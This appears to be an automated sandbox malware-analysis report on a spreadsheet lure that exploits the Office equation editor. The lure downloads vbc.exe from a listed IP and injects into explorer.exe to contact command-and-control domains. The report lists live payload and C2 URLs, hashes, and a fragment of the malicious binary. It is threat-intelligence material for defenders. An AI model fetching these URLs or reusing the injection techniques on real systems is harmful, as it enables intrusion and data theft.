        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Extra Window Memory Injection1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 483690 Sample: (RFQ) No.109050.xlsx Startdate: 15/09/2021 Architecture: WINDOWS Score: 100 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Found malware configuration 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 17 other signatures 2->58 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 34 36 2->15         started        process3 dnsIp4 44 198.12.84.109, 49165, 80 AS-COLOCROSSINGUS United States 10->44 32 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 76 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->76 17 vbc.exe 10->17         started        36 C:\Users\user\...\~$(RFQ) No.109050.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Machine Learning detection for dropped file 17->46 48 Tries to detect virtualization through RDTSC time measurements 17->48 50 Injects a PE file into a foreign processes 17->50 20 vbc.exe 17->20         started        process9 signatures10 60 Modifies the context of a thread in another process (thread injection) 20->60 62 Maps a DLL or memory area into another process 20->62 64 Sample uses process hollowing technique 20->64 66 Queues an APC in another process (thread injection) 20->66 23 explorer.exe 20->23 injected process11 dnsIp12 38 aubergetoitrouge.com 144.217.61.66, 49166, 80 OVHFR Canada 23->38 40 afishin.xshoppy.shop 75.2.89.208, 49168, 80 AMAZON-02US United States 23->40 42 7 other IPs or domains 23->42 68 System process connects to network (likely due to code injection or exploit) 23->68 27 raserver.exe 23->27         started        signatures13 process14 signatures15 70 Modifies the context of a thread in another process (thread injection) 27->70 72 Maps a DLL or memory area into another process 27->72 74 Tries to detect virtualization through RDTSC time measurements 27->74 30 cmd.exe 27->30         started        process16

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        (RFQ) No.109050.xlsx34%ReversingLabsDocument-OLE.Exploit.CVE-2017-11882

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\vbc.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe100%Joe Sandbox ML

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        7.2.vbc.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

        Domains

        SourceDetectionScannerLabelLink
        boxtobookshelf.com1%VirustotalBrowse
        corpmat.com0%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
        http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T70%Avira URL Cloudsafe
        http://www.iis.fhg.de/audioPA0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://treyresearch.net0%URL Reputationsafe
        http://java.sun.com0%Avira URL Cloudsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7100%Avira URL Cloudmalware
        http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T70%Avira URL Cloudsafe
        http://computername/printers/printername/.printer0%Avira URL Cloudsafe
        http://198.12.84.109/cmd/vbc.exe0%Avira URL Cloudsafe
        www.afishin.com/r48a/100%Avira URL Cloudmalware
        http://www.%s.comPA0%URL Reputationsafe
        http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T70%Avira URL Cloudsafe
        http://servername/isapibackend.dll0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        boxtobookshelf.com
        		34.98.99.30
        		truefalseunknown
        afishin.xshoppy.shop
        		75.2.89.208
        		truetrue
          		unknown
          corpmat.com
          		34.102.136.180
          		truefalseunknown
          aubergetoitrouge.com
          		144.217.61.66
          		truetrue
            		unknown
            www.hansel-design.com
            		unknown
            		unknowntrue
              		unknown
              www.aubergetoitrouge.com
              		unknown
              		unknowntrue
                		unknown
                www.corpmat.com
                		unknown
                		unknowntrue
                  		unknown
                  www.afishin.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.boxtobookshelf.com
                    		unknown
                    		unknowntrue
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://www.corpmat.com/r48a/?c6Al7=2Rzi8Yj6/Bi01eAfEHjBLqabwXtDDeMENe5GOpaDyE7pCbPj3uZiRxLvQfHvYqc4eHnj6w==&Pj=-ZPHurVh_0pD5T7false
                      • Avira URL Cloud: safe
                      		unknown
                      http://www.afishin.com/r48a/?c6Al7=LxhAJNTZvxcDVsFYS6bCkMlCl8flV20C1M37CH6Gh+RPID4ASUQUpkYPhbv5Ge3pJAOGnQ==&Pj=-ZPHurVh_0pD5T7true
                      • Avira URL Cloud: malware
                      		unknown
                      http://www.boxtobookshelf.com/r48a/?c6Al7=1TE2uVNv4WkqZ5wK9+DvX2X79O/td5E/IwUCAhT3ylibUknoNf4NSKzNJLQ49MPyx4kq0g==&Pj=-ZPHurVh_0pD5T7false
                      • Avira URL Cloud: safe
                      		unknown
                      http://198.12.84.109/cmd/vbc.exetrue
                      • Avira URL Cloud: safe
                      		unknown
                      www.afishin.com/r48a/true
                      • Avira URL Cloud: malware
                      		low
                      http://www.aubergetoitrouge.com/r48a/?c6Al7=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&Pj=-ZPHurVh_0pD5T7true
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://www.windows.com/pctv.explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                        		high
                        http://investor.msn.comexplorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                          		high
                          http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                            		high
                            http://wellformedweb.org/CommentAPI/explorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                              		high
                              http://treyresearch.netexplorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpfalse
                                		high
                                http://java.sun.comexplorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.icra.org/vocabulary/.explorer.exe, 00000008.00000000.482122813.0000000002CC7000.00000002.00020000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpfalse
                                  		high
                                  http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.day.com/dam/1.045F1FF87.emf.0.drfalse
                                      		high
                                      http://investor.msn.com/explorer.exe, 00000008.00000000.499513895.0000000002AE0000.00000002.00020000.sdmpfalse
                                        		high
                                        http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.495009195.0000000008433000.00000004.00000001.sdmpfalse
                                          		high
                                          http://computername/printers/printername/.printerexplorer.exe, 00000008.00000000.501039580.0000000004650000.00000002.00020000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.%s.comPAexplorer.exe, 00000008.00000000.489205136.0000000001BE0000.00000002.00020000.sdmpfalse
                                          • URL Reputation: safe
                                          		low
                                          http://www.autoitscript.com/autoit3explorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpfalse
                                            		high
                                            https://support.mozilla.orgexplorer.exe, 00000008.00000000.488903396.0000000000255000.00000004.00000020.sdmpfalse
                                              		high
                                              http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.482845859.0000000003E50000.00000002.00020000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              198.12.84.109
                                              		unknownUnited States
                                              		36352AS-COLOCROSSINGUStrue
                                              34.102.136.180
                                              		corpmat.comUnited States
                                              		15169GOOGLEUSfalse
                                              34.98.99.30
                                              		boxtobookshelf.comUnited States
                                              		15169GOOGLEUSfalse
                                              144.217.61.66
                                              		aubergetoitrouge.comCanada
                                              		16276OVHFRtrue
                                              75.2.89.208
                                              		afishin.xshoppy.shopUnited States
                                              		16509AMAZON-02UStrue

                                              General Information

                                              Joe Sandbox Version:33.0.0 White Diamond
                                              Analysis ID:483690
                                              Start date:15.09.2021
                                              Start time:11:40:38
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 10m 47s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:(RFQ) No.109050.xlsx
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:11
                                              Number of new started drivers analysed:2
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLSX@9/19@5/5
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 6.3% (good quality ratio 6%)
                                              • Quality average: 72.9%
                                              • Quality standard deviation: 26.5%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .xlsx
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, conhost.exe, svchost.exe
                                              • TCP Packets have been reduced to 100
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtCreateFile calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              11:41:45API Interceptor64x Sleep call for process: EQNEDT32.EXE modified
                                              11:41:48API Interceptor53x Sleep call for process: vbc.exe modified
                                              11:42:12API Interceptor206x Sleep call for process: raserver.exe modified
                                              11:43:06API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              198.12.84.109ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/avs/vbc.exe
                                              PO-80722 .xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/av/vbc.exe
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/rever/vbc.exe
                                              PO 60078.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/http/vbc.exe
                                              Players profile-661735550.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/www/vbc.exe
                                              ORDER 922021.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/kews/vbc.exe
                                              Quotation request.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/wdcb/vbc.exe
                                              PO 446593.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/ping/vbc.exe
                                              RFQ 10305 .xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/pnb/vbc.exe
                                              19082021.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109/hdfc/vbc.exe
                                              144.217.61.66ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • www.aubergetoitrouge.com/r48a/?-ZDhz=WvIXBnuXy4zpuni0&8pBh=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • www.aubergetoitrouge.com/r48a/?Br=wC1czlHtHJOIwEvZ4PQX06BQ8ZOMJ62w8+xsTz2Q4T7E2YSNIqqm4eyJ4Ejs7FpYzdcNqA==&nleTs=-Zy83VrHWfxhip

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              OVHFRORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                              • 192.99.131.252
                                              qy2t7MIRoi.exeGet hashmaliciousBrowse
                                              • 92.222.145.236
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 144.217.61.66
                                              zB34E25PZM.exeGet hashmaliciousBrowse
                                              • 87.98.185.184
                                              USD INV#1191189.xlsxGet hashmaliciousBrowse
                                              • 213.186.33.5
                                              mipsGet hashmaliciousBrowse
                                              • 54.37.203.235
                                              lEsEX3McwH.exeGet hashmaliciousBrowse
                                              • 51.254.69.209
                                              5cv9ajEWlIGet hashmaliciousBrowse
                                              • 51.79.103.19
                                              oAQ0OaThsMGet hashmaliciousBrowse
                                              • 213.251.181.247
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 144.217.61.66
                                              New_PO0056329.xlsxGet hashmaliciousBrowse
                                              • 164.132.216.38
                                              Z9GkJvygEk.exeGet hashmaliciousBrowse
                                              • 149.56.94.218
                                              RZAcKBlQo0.exeGet hashmaliciousBrowse
                                              • 51.89.143.152
                                              F1MwWrwBR7.exeGet hashmaliciousBrowse
                                              • 51.89.143.157
                                              Ernest_Skye_Mitchell.htmlGet hashmaliciousBrowse
                                              • 167.114.119.127
                                              mDkCoW1yzV.exeGet hashmaliciousBrowse
                                              • 51.89.96.41
                                              Payment voucher. pdf.................gz.exeGet hashmaliciousBrowse
                                              • 51.222.134.241
                                              5siADx4Pdz.exeGet hashmaliciousBrowse
                                              • 51.89.96.41
                                              9e5SOQ1wPzGet hashmaliciousBrowse
                                              • 139.99.135.131
                                              7LqDcyRJiNGet hashmaliciousBrowse
                                              • 139.99.135.131
                                              AS-COLOCROSSINGUS70A and 90A, quantity 20000 tons.xlsxGet hashmaliciousBrowse
                                              • 192.3.141.149
                                              Remittance_Advice_details001009142021.xlsxGet hashmaliciousBrowse
                                              • 107.173.219.122
                                              ORDER CONFIRMATION.xlsxGet hashmaliciousBrowse
                                              • 198.23.212.143
                                              Pedido.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.190
                                              #U0110#U1eb6T MUA H#U00c0NG VNU_014092021.xlsxGet hashmaliciousBrowse
                                              • 23.95.85.181
                                              09142021_PDF.vbsGet hashmaliciousBrowse
                                              • 23.94.82.41
                                              Swift Mt103.xlsxGet hashmaliciousBrowse
                                              • 23.95.13.175
                                              vkb.xlsxGet hashmaliciousBrowse
                                              • 192.3.13.11
                                              Transfer Swift.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.190
                                              ORDER 5172020.xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109
                                              REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                              • 23.94.159.208
                                              proforma invoice.xlsxGet hashmaliciousBrowse
                                              • 192.3.141.149
                                              Swift_Mt103.xlsxGet hashmaliciousBrowse
                                              • 23.95.13.175
                                              PO-80722 .xlsxGet hashmaliciousBrowse
                                              • 198.12.84.109
                                              MT103-Swift Copy.xlsxGet hashmaliciousBrowse
                                              • 198.46.199.203
                                              Items_quote.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.145
                                              Usd_transfer.xlsxGet hashmaliciousBrowse
                                              • 172.245.26.145
                                              REF_MIDLGB34.xlsxGet hashmaliciousBrowse
                                              • 23.94.159.208
                                              ORDER RFQ1009202.xlsxGet hashmaliciousBrowse
                                              • 23.95.85.181
                                              msn.xlsxGet hashmaliciousBrowse
                                              • 198.12.127.217

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:downloaded
                                              Size (bytes):538624
                                              Entropy (8bit):7.1421525751651425
                                              Encrypted:false
                                              SSDEEP:12288:aWHCM2K4CXmePITM0KbDAa8p0MQRqPbPJ3jNWAYH+jbRX2t:23CXXPIQ0gvM9DxtYH+92
                                              MD5:A3F424F32B637CB917E6596FAE56E401
                                              SHA1:9FF12D1CFCA13F94EEDBEB016974ECAE44B56266
                                              SHA-256:32258A09DDCB62EA68D47261889D0E888723AFBAB1BC4A3F137EC2E3C0DC01D4
                                              SHA-512:F238DD5F32E4D862C19F40B5264F0093DD6BBA251DB6FF68FD42D9BE8331111661781DDAB85E0DE3FE4F9B6A919E15782855EE329FE8CCAFB3641523FF0BA0C5
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              Reputation:low
                                              IE Cache URL:http://198.12.84.109/cmd/vbc.exe
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............jM... ...`....@.. ....................................@..................................M..O....`...............................L............................................... ............... ..H............text...p-... ...................... ..`.rsrc........`.......0..............@..@.reloc...............6..............@..B................LM......H........?..._......o.......P...........................................~..$}......}......}.....(......*...$}......}......}.....(........}......}....*...0..O.........$}......}......}.....(........{....}......{....}......{....}......{....}....*:..{....(.....*...0..w..........R.{........,f.r...p(....-).r!..p(....-%.r-..p(....-%.r9..p(....-%+0..}....+'..J.{....XT+...J.{....XT+...J.{....XT+.*..0...........rE..p.+..*..0...........r...p.+..*..0..................+..*".(.....*....0..
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\248940E8.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2791E8B4.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A4E0740.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 613 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):6815
                                              Entropy (8bit):7.871668067811304
                                              Encrypted:false
                                              SSDEEP:96:pJzjDc7s5VhrOxAUp8Yy5196FOMVsoKZkl3p1NdBzYPx7yQgtCPe1NSMjRP9:ppDc7sk98YM19SC/27QptgtCPWkUl
                                              MD5:E2267BEF7933F02C009EAEFC464EB83D
                                              SHA1:ACFEECE4B83B30C8B38BEB4E5954B075EAF756AE
                                              SHA-256:BF5DF4A66D0C02D43BB4AC423D0B50831A83CDB8E8C23CF36EAC8D79383AA2A7
                                              SHA-512:AB1C3C23B5533C5A755CCA7FF6D8B8111577ED2823224E2E821DD517BC4E6D2B6E1353B1AFEAC6DB570A8CA1365F82CA24D5E1155C50B12556A1DF25373620FF
                                              Malicious:false
                                              Preview: .PNG........IHDR...e...P.....X.......sBIT.....O.....sRGB.........gAMA......a.....pHYs..........+......tEXtSoftware.gnome-screenshot...>....IDATx^..tT....?.$.(.C..@.Ah.Z4.g...5[Vzv.v[9.=..KOkkw......(v.b..kYJ[.]...U...T$....!.....3....y3y....$.d....y..{....}....{.{..._6p#.. .. .. ..H(......I..H..H..H..4..c.l.E.B.$@.$@.$@.$0.........O[.9e......7......"''g.Da.$@.$@.$@.$0v.x.^....{..=...3..a0\7.|...5())...}<vIQs. .. .. .....K>].........3..K.[.nE..Q..E............._2.k...4l.)........p............eK..S..[w^..YX...4.\]]]....w.....H..H..H...E`.)..*n.\...Sw.?..O..LM...H..`F$@.$@.$@.$.4..Nv.Hh...OV......9..(.........@..L..<..ef&..;.S..=..MifD.$@.$@.$@.N#.1i..D...qO.S.....rY.oc...|.-..X./.].].rm.V<..l..U.q>v.1.G.}h+Z"...S..r.X..S.#x...FokVv.L.&.....8. 9.3m.6@.p..8.#...|.RiNY.+.b...E.W.8^..o....;'..\.}........|F.8V....x.8^~.>\..S....o..j.....m..I.....B.ZN....6\b.G...X.5....Or!...m.6@......yL.>.!R.\. ...._.....7..G.i.e.......9..r..[F.r.....P4.e.k.{..@].......
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2B379A2D.jpeg
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                                              Category:dropped
                                              Size (bytes):85020
                                              Entropy (8bit):7.2472785111025875
                                              Encrypted:false
                                              SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                                              MD5:738BDB90A9D8929A5FB2D06775F3336F
                                              SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                                              SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                                              SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                                              Malicious:false
                                              Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39A93B7B.png
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
                                              Category:dropped
                                              Size (bytes):49744
                                              Entropy (8bit):7.99056926749243
                                              Encrypted:true
                                              SSDEEP:768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
                                              MD5:63A6CB15B2B8ECD64F1158F5C8FBDCC8
                                              SHA1:8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
                                              SHA-256:AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
                                              SHA-512:BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
                                              Malicious:false
